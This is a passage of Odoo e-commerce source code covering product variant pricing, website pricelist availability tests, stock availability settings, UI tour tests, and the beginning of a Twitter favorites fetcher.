:type parent_combination: recordset `product.template.attribute.value`
:return: True if it's possible to quickly add to cart, else False
:rtype: bool
"""
self.ensure_one()
if not self._is_add_to_cart_possible(parent_combination):
return False
gen = self._get_possible_combinations(parent_combination)
first_possible_combination = next(gen)
if next(gen, False) is not False:
# there are at least 2 possible combinations.
return False
if self._has_is_custom_values():
return False
if self.optional_product_ids.filtered(lambda p: p._is_add_to_cart_possible(first_possible_combination)):
return False
return True
@api.multi
def _get_possible_variants_sorted(self, parent_combination=None):
"""Return the sorted recordset of variants that are possible.
The order is based on the order of the attributes and their values.
See `_get_possible_variants` for the limitations of this method with
dynamic or no_variant attributes, and also for a warning about
performances.
:param parent_combination: combination from which `self` is an
optional or accessory product
:type parent_combination: recordset `product.template.attribute.value`
:return: the sorted variants that are possible
:rtype: recordset of `product.product`
"""
self.ensure_one()
def _sort_key_attribute_value(value):
# if you change this order, keep it in sync with _order from `product.attribute`
return (value.attribute_id.sequence, value.attribute_id.id)
def _sort_key_variant(variant):
"""
We assume all variants will have the same attributes, with only one value for each.
- first level sort: same as "product.attribute"._order
- second level sort: same as "product.attribute.value"._order
"""
keys = []
for attribute in variant.attribute_value_ids.sorted(_sort_key_attribute_value):
# if you change this order, keep it in sync with _order from `product.attribute.value`
keys.append(attribute.sequence)
keys.append(attribute.id)
return keys
return self._get_possible_variants(parent_combination).sorted(_sort_key_variant)
@api.multi
def _get_combination_info(self, combination=False, product_id=False, add_qty=1, pricelist=False, parent_combination=False, only_template=False):
"""Override for website, where we want to:
- take the website pricelist if no pricelist is set
- apply the b2b/b2c setting to the result
This will work when adding website_id to the context, which is done
automatically when called from routes with website=True.
"""
self.ensure_one()
current_website = False
if self.env.context.get('website_id'):
current_website = self.env['website'].get_current_website()
if not pricelist:
pricelist = current_website.get_current_pricelist()
combination_info = super(ProductTemplate, self)._get_combination_info(
combination=combination, product_id=product_id, add_qty=add_qty, pricelist=pricelist,
parent_combination=parent_combination, only_template=only_template)
if self.env.context.get('website_id'):
partner = self.env.user.partner_id
company_id = current_website.company_id
product = self.env['product.product'].browse(combination_info['product_id']) or self
tax_display = self.env.user.has_group('account.group_show_line_subtotals_tax_excluded') and 'total_excluded' or 'total_included'
taxes = partner.property_account_position_id.map_tax(product.sudo().taxes_id.filtered(lambda x: x.company_id == company_id), product, partner)
# The list_price is always the price of one.
quantity_1 = 1
price = taxes.compute_all(combination_info['price'], pricelist.currency_id, quantity_1, product, partner)[tax_display]
if pricelist.discount_policy == 'without_discount':
list_price = taxes.compute_all(combination_info['list_price'], pricelist.currency_id, quantity_1, product, partner)[tax_display]
else:
list_price = price
has_discounted_price = pricelist.currency_id.compare_amounts(list_price, price) == 1
combination_info.update(
price=price,
list_price=list_price,
has_discounted_price=has_discounted_price,
)
return combination_info
@api.multi
def _create_first_product_variant(self, log_warning=False):
"""Create if necessary and possible and return the first product
variant for this template.
:param log_warning: whether a warning should be logged on fail
:type log_warning: bool
:return: the first product variant or none
:rtype: recordset of `product.product`
"""
return self._create_product_variant(self._get_first_possible_combination(), log_warning)
@api.multi
def _get_current_company_fallback(self, **kwargs):
"""Override: if a website is set on the product or given, fallback to
the company of the website. Otherwise use the one from parent method."""
res = super(ProductTemplate, self)._get_current_company_fallback(**kwargs)
website = self.website_id or kwargs.get('website')
return website and website.company_id or res
def _default_website_sequence(self):
self._cr.execute("SELECT MIN(website_sequence) FROM %s" % self._table)
min_sequence = self._cr.fetchone()[0]
return min_sequence and min_sequence - 1 or 10
def set_sequence_top(self):
self.website_sequence = self.sudo().search([], order='website_sequence desc', limit=1).website_sequence + 1
def set_sequence_bottom(self):
self.website_sequence = self.sudo().search([], order='website_sequence', limit=1).website_sequence - 1
def set_sequence_up(self):
previous_product_tmpl = self.sudo().search(
[('website_sequence', '>', self.website_sequence), ('website_published', '=', self.website_published)],
order='website_sequence', limit=1)
if previous_product_tmpl:
previous_product_tmpl.website_sequence, self.website_sequence = self.website_sequence, previous_product_tmpl.website_sequence
else:
self.set_sequence_top()
def set_sequence_down(self):
next_product_tmpl = self.search([('website_sequence', '<', self.website_sequence), ('website_published', '=', self.website_published)], order='website_sequence desc', limit=1)
if next_product_tmpl:
next_product_tmpl.website_sequence, self.website_sequence = self.website_sequence, next_product_tmpl.website_sequence
else:
return self.set_sequence_bottom()
def _default_website_meta(self):
res = super(ProductTemplate, self)._default_website_meta()
res['default_opengraph']['og:description'] = res['default_twitter']['twitter:description'] = self.description_sale
res['default_opengraph']['og:title'] = res['default_twitter']['twitter:title'] = self.name
res['default_opengraph']['og:image'] = res['default_twitter']['twitter:image'] = "/web/image/product.template/%s/image" % (self.id)
return res
@api.multi
def _compute_website_url(self):
super(ProductTemplate, self)._compute_website_url()
for product in self:
product.website_url = "/shop/product/%s" % (product.id,)
class Product(models.Model):
_inherit = "product.product"
website_id = fields.Many2one(related='product_tmpl_id.website_id', readonly=False)
# website_price deprecated, directly use _get_combination_info instead
website_price = fields.Float('Website price', compute='_website_price', digits=dp.get_precision('Product Price'))
# website_public_price deprecated, directly use _get_combination_info instead
website_public_price = fields.Float('Website public price', compute='_website_price', digits=dp.get_precision('Product Price'))
# website_price_difference deprecated, directly use _get_combination_info instead
website_price_difference = fields.Boolean('Website price difference', compute='_website_price')
def _website_price(self):
for product in self:
res = product._get_combination_info_variant()
product.website_price = res.get('price')
product.website_public_price = res.get('list_price')
product.website_price_difference = res.get('has_discounted_price')
@api.multi
def website_publish_button(self):
self.ensure_one()
return self.product_tmpl_id.website_publish_button()
class ProductImage(models.Model):
_name = 'product.image'
_description = 'Product Image'
name = fields.Char('Name')
image = fields.Binary('Image', attachment=True)
product_tmpl_id = fields.Many2one('product.template', 'Related Product', copy=True)
```
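The availability rule documented in `_is_available_on_website` above (specific to the current website, or generic and either selectable or carrying a promo code) can be read as a one-line predicate. The sketch below restates it on plain values; it is not the ORM domain from `_get_website_pricelists_domain`, just the same rule in isolation:

```python
def pricelist_available(website_id, pl_website_id, selectable, code):
    """Specific pricelist of this website, or generic (no website) and either
    selectable in the pricelist selector or attached to a promo code."""
    return pl_website_id == website_id or (not pl_website_id and (selectable or bool(code)))

assert pricelist_available(1, 1, False, None)         # website-specific pricelist
assert pricelist_available(1, None, True, None)       # generic, selectable
assert pricelist_available(1, None, False, 'XMAS')    # generic promotion code
assert not pricelist_available(1, None, False, None)  # backend-only pricelist
assert not pricelist_available(1, 2, True, 'XMAS')    # belongs to another website
```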
#### File: website_sale_stock/models/res_config_settings.py
```python
from odoo import fields, models, api
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
inventory_availability = fields.Selection([
('never', 'Sell regardless of inventory'),
('always', 'Show inventory on website and prevent sales if not enough stock'),
('threshold', 'Show inventory below a threshold and prevent sales if not enough stock'),
('custom', 'Show product-specific notifications'),
], string='Inventory Availability', default='never')
available_threshold = fields.Float(string='Availability Threshold')
@api.multi
def set_values(self):
super(ResConfigSettings, self).set_values()
IrDefault = self.env['ir.default'].sudo()
IrDefault.set('product.template', 'inventory_availability', self.inventory_availability)
IrDefault.set('product.template', 'available_threshold', self.available_threshold if self.inventory_availability == 'threshold' else None)
@api.model
def get_values(self):
res = super(ResConfigSettings, self).get_values()
IrDefault = self.env['ir.default'].sudo()
res.update(inventory_availability=IrDefault.get('product.template', 'inventory_availability') or 'never',
available_threshold=IrDefault.get('product.template', 'available_threshold') or 5.0)
return res
```
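The `set_values`/`get_values` pair above simply round-trips the two stock settings through `ir.default`. A short sketch, assuming an Odoo environment, of reading them back outside the settings wizard; the keys and fallbacks mirror `get_values`.

```python
# Sketch, assuming an Odoo environment with website_sale_stock installed.
IrDefault = env['ir.default'].sudo()
availability = IrDefault.get('product.template', 'inventory_availability') or 'never'
threshold = IrDefault.get('product.template', 'available_threshold') or 5.0
print(availability, threshold)
```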
#### File: website_sale/tests/test_website_sale_pricelist.py
```python
try:
from unittest.mock import patch
except ImportError:
from mock import patch
from odoo.tests.common import HttpCase, TransactionCase
from odoo.tools import DotDict
''' /!\/!\
Calling `get_pricelist_available` after setting `property_product_pricelist` on
a partner will not work as expected. That field will change the output of
`get_pricelist_available` but modifying it will not invalidate the cache.
Thus, tests should not do:
self.env.user.partner_id.property_product_pricelist = my_pricelist
pls = self.get_pricelist_available()
self.assertEqual(...)
self.env.user.partner_id.property_product_pricelist = another_pricelist
pls = self.get_pricelist_available()
self.assertEqual(...)
because the `_get_pl_partner_order` cache won't be invalidated between the calls: the
output won't be the expected one and the tests won't actually test anything.
Try to keep a single call to `get_pricelist_available` per test method.
'''
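# Sketch of the recommended shape (hypothetical test, not from the original file):
# one `get_pricelist_available` call per test method, so the cached
# `_get_pl_partner_order` result can never leak between assertions.
#
#     def test_pricelist_for_belgian_partner(self):
#         self.env.user.partner_id.property_product_pricelist = my_pricelist  # hypothetical pricelist
#         pls = self.get_pricelist_available()
#         self.assertIn(my_pricelist, pls)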
class TestWebsitePriceList(TransactionCase):
# Mock needed because request.session doesn't exist during tests
def _get_pricelist_available(self, show_visible=False):
return self.get_pl(self.args.get('show'), self.args.get('current_pl'), self.args.get('country'))
def setUp(self):
super(TestWebsitePriceList, self).setUp()
self.env.user.partner_id.country_id = False # Remove country to avoid property pricelist computed.
self.website = self.env['website'].browse(1)
self.website.user_id = self.env.user
self.env['product.pricelist'].search([]).write({'website_id': False})
website_pls = ('list_benelux', 'list_christmas', 'list_europe')
for pl in website_pls:
self.env.ref('website_sale.' + pl).website_id = self.website.id
self.env.ref('product.list0').website_id = self.website.id
self.env.ref('website_sale.list_benelux').selectable = True
self.website.pricelist_id = self.ref('product.list0')
ca_group = self.env['res.country.group'].create({
'name': 'Canada',
'country_ids': [(6, 0, [self.ref('base.ca')])]
})
self.env['product.pricelist'].create({
'name': 'Canada',
'selectable': True,
'website_id': self.website.id,
'country_group_ids': [(6, 0, [ca_group.id])],
'sequence': 10
})
self.args = {
'show': False,
'current_pl': False,
}
patcher = patch('odoo.addons.website_sale.models.website.Website.get_pricelist_available', wraps=self._get_pricelist_available)
patcher.start()
self.addCleanup(patcher.stop)
def get_pl(self, show, current_pl, country):
pl_ids = self.website._get_pl_partner_order(
country,
show,
self.website.pricelist_id.id,
current_pl,
self.website.pricelist_ids
)
return self.env['product.pricelist'].browse(pl_ids)
def test_get_pricelist_available_show(self):
show = True
current_pl = False
country_list = {
False: ['Public Pricelist', 'EUR', 'Benelux', 'Canada'],
'BE': ['EUR', 'Benelux'],
'IT': ['EUR'],
'CA': ['Canada'],
'US': ['Public Pricelist', 'EUR', 'Benelux', 'Canada']
}
for country, result in country_list.items():
pls = self.get_pl(show, current_pl, country)
self.assertEquals(len(set(pls.mapped('name')) & set(result)), len(pls), 'Test failed for %s (%s %s vs %s %s)'
% (country, len(pls), pls.mapped('name'), len(result), result))
def test_get_pricelist_available_not_show(self):
show = False
current_pl = False
country_list = {
False: ['Public Pricelist', 'EUR', 'Benelux', 'Christmas', 'Canada'],
'BE': ['EUR', 'Benelux', 'Christmas'],
'IT': ['EUR', 'Christmas'],
'US': ['Public Pricelist', 'EUR', 'Benelux', 'Christmas', 'Canada'],
'CA': ['Canada']
}
for country, result in country_list.items():
pls = self.get_pl(show, current_pl, country)
self.assertEquals(len(set(pls.mapped('name')) & set(result)), len(pls), 'Test failed for %s (%s %s vs %s %s)'
% (country, len(pls), pls.mapped('name'), len(result), result))
def test_get_pricelist_available_promocode(self):
christmas_pl = self.ref('website_sale.list_christmas')
country_list = {
False: True,
'BE': True,
'IT': True,
'US': True,
'CA': False
}
for country, result in country_list.items():
self.args['country'] = country
# mock patch method could not pass env context
available = self.website.is_pricelist_available(christmas_pl)
if result:
self.assertTrue(available, 'AssertTrue failed for %s' % country)
else:
self.assertFalse(available, 'AssertFalse failed for %s' % country)
def test_get_pricelist_available_show_with_auto_property(self):
show = True
self.env.user.partner_id.country_id = self.env.ref('base.be') # Add EUR pricelist auto
current_pl = False
country_list = {
False: ['Public Pricelist', 'EUR', 'Benelux', 'Canada'],
'BE': ['EUR', 'Benelux'],
'IT': ['EUR'],
'CA': ['EUR', 'Canada'],
'US': ['Public Pricelist', 'EUR', 'Benelux', 'Canada']
}
for country, result in country_list.items():
pls = self.get_pl(show, current_pl, country)
self.assertEquals(len(set(pls.mapped('name')) & set(result)), len(pls), 'Test failed for %s (%s %s vs %s %s)'
% (country, len(pls), pls.mapped('name'), len(result), result))
def simulate_frontend_context(self, website_id=1):
# Mocking this method is enough to simulate the frontend context in most methods
def get_request_website():
return self.env['website'].browse(website_id)
patcher = patch('odoo.addons.website.models.ir_http.get_request_website', wraps=get_request_website)
patcher.start()
self.addCleanup(patcher.stop)
class TestWebsitePriceListAvailable(TransactionCase):
# This is enough to avoid a mock (request.session/website do not exist during test)
def get_pricelist_available(self, show_visible=False, website_id=1, country_code=None, website_sale_current_pl=None):
request = DotDict({
'website': self.env['website'].browse(website_id),
'session': {
'geoip': {
'country_code': country_code,
},
'website_sale_current_pl': website_sale_current_pl,
},
})
return self.env['website']._get_pricelist_available(request, show_visible)
def setUp(self):
super(TestWebsitePriceListAvailable, self).setUp()
Pricelist = self.env['product.pricelist']
Website = self.env['website']
# Set up 2 websites
self.website = Website.browse(1)
self.website2 = Website.create({'name': 'Website 2'})
# Remove existing pricelists and create new ones
Pricelist.search([]).write({'active': False})
self.backend_pl = Pricelist.create({
'name': 'Backend Pricelist',
'website_id': False,
})
self.generic_pl_select = Pricelist.create({
'name': 'Generic Selectable Pricelist',
'selectable': True,
'website_id': False,
})
self.generic_pl_code = Pricelist.create({
'name': 'Generic Code Pricelist',
'code': 'GENERICCODE',
'website_id': False,
})
self.generic_pl_code_select = Pricelist.create({
'name': 'Generic Code Selectable Pricelist',
'code': 'GENERICCODESELECT',
'selectable': True,
'website_id': False,
})
self.w1_pl = Pricelist.create({
'name': 'Website 1 Pricelist',
'website_id': self.website.id,
})
self.w1_pl_select = Pricelist.create({
'name': 'Website 1 Pricelist Selectable',
'website_id': self.website.id,
'selectable': True,
})
self.w1_pl_code = Pricelist.create({
'name': 'Website 1 Pricelist Code',
'website_id': self.website.id,
'code': 'W1CODE',
})
self.w1_pl_code_select = Pricelist.create({
'name': 'Website 1 Pricelist Code Selectable',
'website_id': self.website.id,
'code': 'W1CODESELECT',
'selectable': True,
})
self.w2_pl = Pricelist.create({
'name': 'Website 2 Pricelist',
'website_id': self.website2.id,
})
simulate_frontend_context(self)
def test_get_pricelist_available(self):
# all_pl = self.backend_pl + self.generic_pl_select + self.generic_pl_code + self.generic_pl_code_select + self.w1_pl + self.w1_pl_select + self.w1_pl_code + self.w1_pl_code_select + self.w2_pl
# Test get all available pricelists
pls_to_return = self.generic_pl_select + self.generic_pl_code + self.generic_pl_code_select + self.w1_pl + self.w1_pl_select + self.w1_pl_code + self.w1_pl_code_select
pls = self.get_pricelist_available()
self.assertEqual(pls, pls_to_return, "Every pricelist having the correct website_id set or (no website_id but a code or selectable) should be returned")
# Test get all available and visible pricelists
pls_to_return = self.generic_pl_select + self.generic_pl_code_select + self.w1_pl_select + self.w1_pl_code_select
pls = self.get_pricelist_available(show_visible=True)
self.assertEqual(pls, pls_to_return, "Only selectable pricelists website compliant (website_id False or current website) should be returned")
def test_property_product_pricelist_for_inactive_partner(self):
# `_get_partner_pricelist_multi` should consider inactive users when searching for pricelists.
# A real-world case is the public user: its `property_product_pricelist` needs to be set,
# as it is passed through `_get_pl_partner_order` as the `website_pl` when searching for
# available pricelists for active users.
public_partner = self.env.ref('base.public_partner')
self.assertFalse(public_partner.active, "Ensure public partner is inactive (purpose of this test)")
pl = public_partner.property_product_pricelist
self.assertEqual(len(pl), 1, "Inactive partner should still get a `property_product_pricelist`")
class TestWebsitePriceListAvailableGeoIP(TestWebsitePriceListAvailable):
def setUp(self):
super(TestWebsitePriceListAvailableGeoIP, self).setUp()
# clean `property_product_pricelist` for partner for this test (clean setup)
self.env['ir.property'].search([('res_id', '=', 'res.partner,%s' % self.env.user.partner_id.id)]).unlink()
# set different country groups on pricelists
c_EUR = self.env.ref('base.europe')
c_BENELUX = self.env.ref('website_sale.benelux')
self.BE = self.env.ref('base.be')
NL = self.env.ref('base.nl')
c_BE = self.env['res.country.group'].create({'name': 'Belgium', 'country_ids': [(6, 0, [self.BE.id])]})
c_NL = self.env['res.country.group'].create({'name': 'Netherlands', 'country_ids': [(6, 0, [NL.id])]})
(self.backend_pl + self.generic_pl_select + self.generic_pl_code + self.w1_pl_select).write({'country_group_ids': [(6, 0, [c_BE.id])]})
(self.generic_pl_code_select + self.w1_pl + self.w2_pl).write({'country_group_ids': [(6, 0, [c_BENELUX.id])]})
(self.w1_pl_code).write({'country_group_ids': [(6, 0, [c_EUR.id])]})
(self.w1_pl_code_select).write({'country_group_ids': [(6, 0, [c_NL.id])]})
# pricelist | selectable | website | code | country group |
# ----------------------------------------------------------------------|
# backend_pl | | | | BE |
# generic_pl_select | V | | | BE |
# generic_pl_code | | | V | BE |
# generic_pl_code_select | V | | V | BENELUX |
# w1_pl | | 1 | | BENELUX |
# w1_pl_select | V | 1 | | BE |
# w1_pl_code | | 1 | V | EUR |
# w1_pl_code_select | V | 1 | V | NL |
# w2_pl | | 2 | | BENELUX |
# available pl for website 1 for GeoIP BE (anything except website 2, backend and NL)
self.website1_be_pl = self.generic_pl_select + self.generic_pl_code + self.w1_pl_select + self.generic_pl_code_select + self.w1_pl + self.w1_pl_code
def test_get_pricelist_available_geoip(self):
# Test get all available pricelists with geoip and no partner pricelist (ir.property)
# property_product_pricelist will also be returned in the available pricelists
self.website1_be_pl += self.env.user.partner_id.property_product_pricelist
pls = self.get_pricelist_available(country_code=self.BE.code)
self.assertEqual(pls, self.website1_be_pl, "Only pricelists for BE and accessible on website should be returned, and the partner pl")
def test_get_pricelist_available_geoip2(self):
# Test get all available pricelists with geoip and a partner pricelist (ir.property) not website compliant
self.env.user.partner_id.property_product_pricelist = self.backend_pl
pls = self.get_pricelist_available(country_code=self.BE.code)
self.assertEqual(pls, self.website1_be_pl, "Only pricelists for BE and accessible on website should be returned as partner pl is not website compliant")
def test_get_pricelist_available_geoip3(self):
# Test get all available pricelists with geoip and a partner pricelist (ir.property) website compliant (but not geoip compliant)
self.env.user.partner_id.property_product_pricelist = self.w1_pl_code_select
self.website1_be_pl += self.env.user.partner_id.property_product_pricelist
pls = self.get_pricelist_available(country_code=self.BE.code)
self.assertEqual(pls, self.website1_be_pl, "Only pricelists for BE and accessible on website should be returned, plus the partner pricelist as it is website compliant")
def test_get_pricelist_available_geoip4(self):
# Test get all available with geoip and visible pricelists + promo pl
pls_to_return = self.generic_pl_select + self.w1_pl_select + self.generic_pl_code_select
# property_product_pricelist will also be returned in the available pricelists
pls_to_return += self.env.user.partner_id.property_product_pricelist
current_pl = self.w1_pl_code
pls = self.get_pricelist_available(country_code=self.BE.code, show_visible=True, website_sale_current_pl=current_pl.id)
self.assertEqual(pls, pls_to_return + current_pl, "Only pricelists for BE, accessible on the website and selectable should be returned. It should also return the applied promo pricelist")
class TestWebsitePriceListHttp(HttpCase):
def test_get_pricelist_available_multi_company(self):
''' Test that the `property_product_pricelist` of `res.partner` is not
computed as SUPERUSER_ID.
Indeed, `property_product_pricelist` is a _compute that ends up
doing a search on `product.pricelist` that would bypass the
pricelist multi-company `ir.rule`. Then it would return pricelists
from another company and the code would raise an access error when
reading that `property_product_pricelist`.
'''
test_company = self.env['res.company'].create({'name': 'Test Company'})
self.env['product.pricelist'].create({
'name': 'Backend Pricelist For "Test Company"',
'website_id': False,
'company_id': test_company.id,
'sequence': 1,
})
self.authenticate('portal', 'portal')
r = self.url_open('/shop')
self.assertEqual(r.status_code, 200, "The page should not raise an access error because of reading pricelists from other companies")
class TestWebsitePriceListMultiCompany(TransactionCase):
def setUp(self):
''' Create a basic multi-company pricelist environment:
- Set up 2 companies with their own company-restricted pricelist each.
- Add demo user in those 2 companies
- For each company, add that company pricelist to the demo user partner.
- Set website's company to company 2
- Demo user will still be in company 1
'''
super(TestWebsitePriceListMultiCompany, self).setUp()
self.demo_user = self.env.ref('base.user_demo')
# Create and add demo user to 2 companies
self.company1 = self.demo_user.company_id
self.company2 = self.env['res.company'].create({'name': 'Test Company'})
self.demo_user.company_ids += self.company2
# Set company2 as current company for demo user
self.website = self.env['website'].browse(1)
self.website.company_id = self.company2
# Create a company pricelist for each company and set it to demo user
self.c1_pl = self.env['product.pricelist'].create({
'name': 'Company 1 Pricelist',
'company_id': self.company1.id,
})
self.c2_pl = self.env['product.pricelist'].create({
'name': 'Company 2 Pricelist',
'company_id': self.company2.id,
'website_id': False,
})
self.demo_user.partner_id.property_product_pricelist = self.c1_pl
# Switch env.user company to create ir.property in company2
self.env.user.company_id = self.company2
self.demo_user.partner_id.property_product_pricelist = self.c2_pl
# Ensure everything was done correctly
self.assertEqual(self.demo_user.partner_id.with_context(force_company=self.company1.id).property_product_pricelist, self.c1_pl)
self.assertEqual(self.demo_user.partner_id.with_context(force_company=self.company2.id).property_product_pricelist, self.c2_pl)
irp1 = self.env['ir.property'].search([
('name', '=', 'property_product_pricelist'),
('company_id', '=', self.company1.id),
('res_id', '=', 'res.partner,%s' % self.demo_user.partner_id.id),
('value_reference', '=', 'product.pricelist,%s' % self.c1_pl.id),
])
irp2 = self.env['ir.property'].search([
('name', '=', 'property_product_pricelist'),
('company_id', '=', self.company2.id),
('res_id', '=', 'res.partner,%s' % self.demo_user.partner_id.id),
('value_reference', '=', 'product.pricelist,%s' % self.c2_pl.id),
])
self.assertEqual(len(irp1 + irp2), 2, "Ensure there is an `ir.property` for demo partner for every company, and that the pricelist is the company specific one.")
simulate_frontend_context(self)
# ---------------------------------- IR.PROPERTY -------------------------------------
# id | name | res_id | company_id | value_reference
# ------------------------------------------------------------------------------------
# 1 | 'property_product_pricelist' | | 1 | product.pricelist,1
# 2 | 'property_product_pricelist' | | 2 | product.pricelist,2
# 3 | 'property_product_pricelist' | res.partner,8 | 1 | product.pricelist,10
# 4 | 'property_product_pricelist' | res.partner,8 | 2 | product.pricelist,11
def test_property_product_pricelist_multi_company(self):
''' Test that the `property_product_pricelist` of `res.partner` is read
for the company of the website and not the current user company.
This is the case when the user visits a website whose company
is not the same as the user's own company.
Here, as demo user (company1), we will visit website1 (company2).
It should return the ir.property for demo user for company2 and not
for the company1 as we should get the website's company pricelist
and not the demo user's current company pricelist.
'''
# First check: It should return ir.property,4 as company_id is
# website.company_id and not env.user.company_id
company_id = self.website.company_id.id
partner = self.demo_user.partner_id.with_context(force_company=company_id)
demo_pl = partner.property_product_pricelist
self.assertEqual(demo_pl, self.c2_pl)
# Second thing to check: it should not raise a read access error.
# Indeed, the company-related ir.rule on pricelists should allow reading
# a pricelist from another company if that company is the one
# of the currently visited website.
self.env(user=self.env.ref('base.user_demo'))['product.pricelist'].browse(demo_pl.id).name
```
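The assertions in `TestWebsitePriceListAvailable` above spell out the availability rule in their messages. The following plain-Python snippet only restates that rule as an illustration; it is not the Odoo implementation.

```python
# Illustration of the rule asserted above, not the actual Odoo code.
def is_available(pl, website_id, show_visible=False):
    website_ok = not pl["website_id"] or pl["website_id"] == website_id
    if show_visible:
        return website_ok and pl["selectable"]
    # kept when tied to the current website, or generic but reachable via a code or selectable flag
    return website_ok and (bool(pl["website_id"]) or bool(pl["code"]) or pl["selectable"])

pricelists = [
    {"name": "Backend Pricelist", "website_id": None, "code": None, "selectable": False},
    {"name": "Website 1 Pricelist Code", "website_id": 1, "code": "W1CODE", "selectable": False},
    {"name": "Website 2 Pricelist", "website_id": 2, "code": None, "selectable": False},
]
print([pl["name"] for pl in pricelists if is_available(pl, website_id=1)])
# -> ['Website 1 Pricelist Code']
```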
#### File: website/tests/test_ui.py
```python
import odoo
import odoo.tests
@odoo.tests.tagged('-at_install', 'post_install')
class TestUiCustomizeTheme(odoo.tests.HttpCase):
def test_01_attachment_website_unlink(self):
''' Some ir.attachment records need to be unlinked when a website is unlinked,
otherwise some flows will just crash. That's the case when 2 websites
have their theme color customized. Removing a website would make its
customized attachments generic, thus leaving 2 attachments with the
same URL available for other websites, leading to singleton errors
(among others).
But not all attachments should be deleted, e.g. we don't want to delete
a SO or invoice PDF coming from an ecommerce order.
'''
Website = self.env['website']
Page = self.env['website.page']
Attachment = self.env['ir.attachment']
website_default = Website.browse(1)
website_test = Website.create({'name': 'Website Test'})
# simulate the attachment state when editing 2 themes through customize
custom_url = '/TEST/website/static/src/scss/options/colors/user_theme_color_palette.custom.web.assets_common.scss'
scss_attachment = Attachment.create({
'name': custom_url,
'type': 'binary',
'mimetype': 'text/scss',
'datas': '',
'datas_fname': custom_url,
'url': custom_url,
'website_id': website_default.id
})
scss_attachment.copy({'website_id': website_test.id})
# simulate PDF from ecommerce order
# Note: it will only have its website_id flag if the website has a domain
# equal to the current URL (fallback or get_current_website())
so_attachment = Attachment.create({
'name': 'SO036.pdf',
'type': 'binary',
'mimetype': 'application/pdf',
'datas': '',
'website_id': website_test.id
})
# avoid sql error on page website_id restrict
Page.search([('website_id', '=', website_test.id)]).unlink()
website_test.unlink()
self.assertEqual(Attachment.search_count([('url', '=', custom_url)]), 1, 'Should not leave duplicates when deleting a website')
self.assertTrue(so_attachment.exists(), 'Most attachments should not be deleted')
self.assertFalse(so_attachment.website_id, 'Website should be removed')
@odoo.tests.tagged('-at_install', 'post_install')
class TestUiHtmlEditor(odoo.tests.HttpCase):
def test_html_editor_multiple_templates(self):
Website = self.env['website']
View = self.env['ir.ui.view']
generic_aboutus = Website.viewref('website.aboutus')
# Use an empty page layout with oe_structure id for this test
oe_structure_layout = '''
<t name="About us" t-name="website.aboutus">
<t t-call="website.layout">
<p>aboutus</p>
<div id="oe_structure_test_ui" class="oe_structure oe_empty"/>
</t>
</t>
'''
generic_aboutus.arch = oe_structure_layout
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('html_editor_multiple_templates')", "odoo.__DEBUG__.services['web_tour.tour'].tours.html_editor_multiple_templates.ready", login='admin')
self.assertEqual(View.search_count([('key', '=', 'website.aboutus')]), 2, "Aboutus view should have been COW'd")
self.assertTrue(generic_aboutus.arch == oe_structure_layout, "Generic Aboutus view should be untouched")
self.assertEqual(len(generic_aboutus.inherit_children_ids.filtered(lambda v: 'oe_structure' in v.name)), 0, "oe_structure view should have been deleted when aboutus was COW")
specific_aboutus = Website.with_context(website_id=1).viewref('website.aboutus')
self.assertTrue(specific_aboutus.arch != oe_structure_layout, "Specific Aboutus view should have been changed")
self.assertEqual(len(specific_aboutus.inherit_children_ids.filtered(lambda v: 'oe_structure' in v.name)), 1, "oe_structure view should have been created on the specific tree")
def test_html_editor_scss(self):
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('test_html_editor_scss')", "odoo.__DEBUG__.services['web_tour.tour'].tours.test_html_editor_scss.ready", login='admin')
class TestUiTranslate(odoo.tests.HttpCase):
def test_admin_tour_rte_translator(self):
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('rte_translator')", "odoo.__DEBUG__.services['web_tour.tour'].tours.rte_translator.ready", login='admin', timeout=120)
@odoo.tests.common.tagged('post_install', '-at_install')
class TestUi(odoo.tests.HttpCase):
def test_01_public_homepage(self):
self.phantom_js("/", "console.log('ok')", "'website.content.snippets.animation' in odoo.__DEBUG__.services")
def test_02_admin_tour_banner(self):
self.phantom_js("/", "odoo.__DEBUG__.services['web_tour.tour'].run('banner')", "odoo.__DEBUG__.services['web_tour.tour'].tours.banner.ready", login='admin')
```
#### File: website_twitter/models/website_twitter.py
```python
import json
import logging
import requests
from odoo import api, fields, models
API_ENDPOINT = 'https://api.twitter.com'
API_VERSION = '1.1'
REQUEST_TOKEN_URL = '%s/oauth2/token' % API_ENDPOINT
REQUEST_FAVORITE_LIST_URL = '%s/%s/favorites/list.json' % (API_ENDPOINT, API_VERSION)
URLOPEN_TIMEOUT = 10
_logger = logging.getLogger(__name__)
class WebsiteTwitter(models.Model):
_inherit = 'website'
twitter_api_key = fields.Char(string='Twitter API key', help='Twitter API Key')
twitter_api_secret = fields.Char(string='Twitter API secret', help='Twitter API Secret')
twitter_screen_name = fields.Char(string='Get favorites from this screen name')
@api.model
def _request(self, website, url, params=None):
"""Send an authenticated request to the Twitter API."""
access_token = self._get_access_token(website)
try:
request = requests.get(url, params=params, headers={'Authorization': 'Bearer %s' % access_token}, timeout=URLOPEN_TIMEOUT)
request.raise_for_status()
return request.json()
except requests.HTTPError as e:
_logger.debug("Twitter API request failed with code: %r, msg: %r, content: %r",
e.response.status_code, e.response.reason, e.response.content)
raise
@api.model
def _refresh_favorite_tweets(self):
''' called by cron job '''
website = self.env['website'].search([('twitter_api_key', '!=', False),
('twitter_api_secret', '!=', False),
('twitter_screen_name', '!=', False)])
_logger.debug("Refreshing tweets for website IDs: %r", website.ids)
website.fetch_favorite_tweets()
@api.multi
def fetch_favorite_tweets(self):
WebsiteTweets = self.env['website.twitter.tweet']
tweet_ids = []
for website in self:
if not all((website.twitter_api_key, website.twitter_api_secret, website.twitter_screen_name)):
_logger.debug("Skip fetching favorite tweets for unconfigured website %s", website)
continue
params = {'screen_name': website.twitter_screen_name}
last_tweet = WebsiteTweets.search([('website_id', '=', website.id),
('screen_name', '=', website.twitter_screen_name)],
limit=1, order='tweet_id desc')
if last_tweet:
params['since_id'] = int(last_tweet.tweet_id)
_logger.debug("Fetching favorite tweets using params %r", params)
response = self._request(website, REQUEST_FAVORITE_LIST_URL, params=params)
for tweet_dict in response:
tweet_id = tweet_dict['id'] # unsigned 64-bit snowflake ID
tweet_ids = WebsiteTweets.search([('tweet_id', '=', tweet_id)]).ids
if not tweet_ids:
new_tweet = WebsiteTweets.create(
{
'website_id': website.id,
'tweet': json.dumps(tweet_dict),
'tweet_id': tweet_id, # stored in NUMERIC PG field
